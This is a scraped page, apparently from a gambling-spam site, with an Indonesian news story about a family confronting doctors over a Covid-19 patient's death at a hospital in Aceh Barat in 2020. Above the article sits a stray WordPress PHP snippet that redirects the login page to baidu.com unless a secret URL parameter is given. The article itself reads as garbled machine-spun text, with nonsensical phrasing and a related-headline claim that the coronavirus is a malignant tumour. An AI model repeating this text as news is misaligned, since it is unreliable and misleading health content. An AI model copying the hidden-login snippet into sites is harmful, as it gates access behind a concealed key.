//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Rumah sakit keluarga yang viral tersebut marah karena dokter baru akan memakai APD saat pasien meninggal | daftar s128_www.s1288.net_s1288 net

TRIBUNNEWS.COM-Video viral seorang tersangka dari keluarga pasien Covid-19 menggila di rumah sakit. -Pasien tidak mendapat perawatan sebelum akhirnya dinyatakan meninggal. -Ketika pasien meninggal, dokter hanya memakai alat pelindung diri.

Rekaman video keluarga pasien yang diduga gila Covid-19 di Bangsal Pinere Rumah Sakit Umum Daerah (RSUD) Cut Nyak Dhien Meulaboh dan menyebarkan virus di jejaring sosial (medsos).

Hal itu dicatat langsung oleh anak pasien tersebut pada Rabu (26/8/2020).

Dalam video berdurasi 03.51 menit tersebut, terlihat bahwa keluarga Anda marah kepada dokter yang mengenakan APD. Saat pasien sekarat.

“Hei, kapan kamu masuk? Kamu bahkan nggak pakai APD. Pasien ini butuh pertolongan!” Teriak keluarga pasien yang terekam dalam video. — Segera, keluarga mengetahui bahwa nyawa orang tuanya telah meninggal, dan mereka menangis histeris. Aceh Barat (Aceh Barat).

Perekamnya adalah Irham Wahyudi (25 tahun), anak BR.

Bacaan: Berlaku di Media Sosial, Warga Terungkap Masuk Peti Mati Selama 5 Menit, Camat Cilandak: Elang-Bacaan: Halo Klaster Baru Pangandaran, Penyebaran Pengantin dan Rias Wajah Positif

– Bacaan: Corona Virus ini merupakan tumor ganas di Indonesia yang bermutasi dan menyebar lebih cepat

Add Comment

Your email address will not be published. Required fields are marked *